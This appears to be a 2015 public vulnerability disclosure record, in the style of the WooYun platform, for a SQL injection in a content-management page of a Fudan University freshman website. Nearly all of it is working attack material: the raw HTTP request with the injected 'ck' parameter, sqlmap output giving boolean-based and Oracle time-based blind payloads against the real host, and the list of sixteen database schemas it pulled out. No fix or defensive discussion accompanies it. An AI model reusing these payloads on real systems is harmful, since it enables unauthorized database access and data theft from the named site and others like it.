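2015-11-09: Details reported to the vendor; awaiting vendor handling.
2015-11-22: The vendor actively ignored the vulnerability; details disclosed to the public.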
GET /cms/view/lm!bksWebShow.action?ck=-1' OR 1=1* or 'qzaCwUmS'=' &id=1010&lmType=42&secondId=402880c447814cc2014781c74cf6002f&showt=lb HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.freshman.fudan.edu.cn
Cookie: JSESSIONID=016D210EF4E434EFB4294E0743C019CB
Host: www.freshman.fudan.edu.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://www.freshman.fudan.edu.cn:80/cms/view/lm!bksWebShow.action?ck=-1' OR 1=1 AND 8864=8864 or 'qzaCwUmS'=' &id=1010&lmType=42&secondId=402880c447814cc2014781c74cf6002f&showt=lb

    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: http://www.freshman.fudan.edu.cn:80/cms/view/lm!bksWebShow.action?ck=-1' OR 1=1 AND 2770=DBMS_PIPE.RECEIVE_MESSAGE(CHR(121)||CHR(79)||CHR(72)||CHR(109),5) or 'qzaCwUmS'=' &id=1010&lmType=42&secondId=402880c447814cc2014781c74cf6002f&showt=lb
---
web application technology: JSP
back-end DBMS: Oracle
available databases [16]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
[*] YX_FUDAN_NEW
Severity: No impact (ignored by vendor)
Ignored at: 2015-11-22 06:20
Vulnerability Rank: 4 (WooYun rating)
None yet